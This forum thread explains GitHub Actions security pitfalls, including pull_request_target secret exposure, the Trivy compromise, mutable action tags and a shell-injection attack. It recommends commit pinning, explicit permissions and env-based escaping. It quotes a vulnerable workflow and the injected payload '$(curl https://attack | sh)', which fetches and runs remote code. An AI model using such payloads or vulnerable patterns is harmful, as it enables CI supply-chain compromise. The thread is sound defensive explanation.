Reviewing GitHub Actions workflows & tokens

GitHub Actions are great! But following some recent news, I wanted to make sure I understood their potential issues… and more importantly, get a better understanding of what I need to be looking for and avoiding. I found both the reporting around the exploit and the GitHub docs a little challenging to understand concretely where the issues lie.

It’s all about avoiding workflows that both have something valuable and can execute attacker-controlled code. The valuable thing in this context is almost certainly a credential with access: tokens, API keys, secrets, etc. And the whole point of pull request CI is… to execute code that someone unknown submits! There are a few key principles that help keep these separated:

  1. The standard on: pull_request: runs triggered from forks don’t get any repository secrets at all (beyond a read-only GitHub token). This is great! But it means, though, that these actions can’t do anything that change the state of the repository beyond their resulting status. They cannot make comments. They can’t add labels. They can’t assign reviewers or upload website previews.

  2. So that’s the whole point of the on: pull_request_target: trigger; it allows actions with the target repository’s secrets available! This enables comments and labeling and such, but this comes with a HUGE caveat: it might also execute code that an attacker directly provides on their branch. Even worse, pull_request_target automatically escalates the default GitHub token’s permissions to contents: write unless you have an explicit permissions section. There’s one bit of protection here: GitHub ignores the changes the pull request makes to the particular workflow.yml file itself. It always uses the file as it is on the default repository branch instead. This protection is only for that one file, so the fundamental rule for pull_request_targets are that they should not reference or include or execute any other files if their secrets use any sort of privileges.

    This is how trivy was initially compromised

    Trivy had an on: pull_request_target workflow to help comment, label, and assign issues. They’re a security conscious org — they knew this was tricky and explicitly commented in the yml to be careful! But earlier that month, a refactor had split out a go setup step into a separate action that was within the repository, uses: ./.github/actions/setup-go.yml. So the attacker changed that file, which was not subject to GitHub’s protections, and opened a PR which promptly dumped the runner’s memory and likely grabbed the org-scoped token they were using to assign reviewers. ref :cry:

  3. But then of course actions often run other code, too, beyond the things that you yourself wrote and trust within your own repository. These are often actions themselves and a step simply uses them. These actions can run in even more trusted contexts, including push:. So again, like any dependency, you want to be sure you know what you’re using, that you trust it and its author/org, and you can limit your possible attack surface. It may be good practice to pin to an exact commit instead of a major @v5 tag (or even @v5.1.2).

    This is how the trivy attack spread through other repos that use: its action

    One particularly pernicious point in this attack was that GitHub tags/releases are (by default) not immutable. So the Trivy attacker was able to simply relabel existing releases with contents: write access in a much less noisy manner than creating a new release would be. Further, they pointed them to a commit on a fork — again, much more subtle than pushing to the base repository. All this subtlety allowed for more time to pass while downstream repositories fired off their privileged and trusted actions. The only thing that could’ve prevented downstream uses from compromise was an explicitly tagged commit.

  4. I think it’s also worth explicitly noting that workflow steps aren’t securely isolated from each other, even though you can independently pass secrets to one step but not the other. Any secret that’s used within the workflow at large could be exfiltrated through a memory dump. Independent workflows, however, are isolated and each only gets the secrets it explicitly references in its yml file (and only that file).


The absolute scariest case here is the pull_request_target workflow that has access to an important secret (the default case!) and includes some execution from elsewhere outside that file. I also think it’s worth limiting all three things as much as possible, because code changes and it’s easy to, e.g., mistakenly add some misdirection or a secret in a gradual manner or otherwise break that fragile isolation… and there’s always other dependency attacks waiting in the future.

So take some time and review your token permissions and workflows today! :slight_smile:

PSA: I just discovered yesterday that there is a repo level setting to “Require actions to be pinned to a full-length commit SHA”. Dependabot will recognize and match whichever action versioning convention (version tag or commit SHA) is used, per step.

Another week, another GHA attack. This time, it was even simpler. A Python package had an issue_comment-triggered workflow that simply echo’ed the comment body (likely for debugging purposes):

    run: |
        echo "Comment Body: ${{ github.event.comment.body }}"
        # ...

This is vulnerable to a straightforward shell injection, so the attacker simply had to comment $(curl https://attack | sh).

This granted the attacker temporary access to the GITHUB_TOKEN (@github-actions[bot]), but they kept the runner alive long enough to tag a new compromised release and trigger a publish-to-pypi workflow. Notably — and unlike many other attacks — this did not require compromising the PyPI token or a separate GitHub PAT.

This is one of the first things GitHub warns about in its security guidance; you should instead use:

    env:
        BODY: ${{ github.event.comment.body }}
    run: |
        echo "Comment Body: $BODY"
        # ...

These sorts of problems are actively and automatedly being exploited and are relatively easy to find.

I didn’t look at all the details but wouldn’t this kind of exploit be detected by CodeQL?

Yes, they’ve been flagging code injection since at least 2025, but I’m not sure if they’d catch the more complicated pull_request_target issue that hit trivy.

It’s a good idea to enable it, though! Julia isn’t supported, but it’ll scan your actions.